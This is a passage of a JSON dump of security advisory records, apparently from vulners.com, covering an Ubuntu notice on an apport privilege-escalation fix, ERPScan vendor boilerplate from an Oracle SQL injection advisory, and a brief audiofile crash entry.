the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}